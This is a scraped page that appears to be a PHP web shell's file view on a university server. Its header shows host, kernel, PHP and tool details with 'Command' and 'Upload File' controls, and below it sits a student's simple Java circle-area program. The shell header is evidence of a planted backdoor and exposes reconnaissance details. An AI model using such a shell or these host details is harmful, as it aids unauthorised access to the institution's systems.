Server IP : 172.16.15.8 / Your IP : 3.15.186.56 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ndlutz/CS 202/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
import java.util.*; import java.text.DecimalFormat; class Rad { static public void main(String[] args) { DecimalFormat f2 = new DecimalFormat("0.0"); int radi; double ar,per; System.out.println("Input the radius, -1 to quit"); Scanner in = new Scanner (System.in); radi= in.nextInt(); while(radi >0) { ar=radi*radi*3.14; per=2*3.14*radi; System.out.println("The area is: " + f2.format(ar) + "."); System.out.println("The perimeter is: " + f2.format(per) + "."); System.out.println(" \n************************ \n"); System.out.println("Input the radius, -1 to quit"); radi= in.nextInt(); } System.out.println("\nThanks."); } }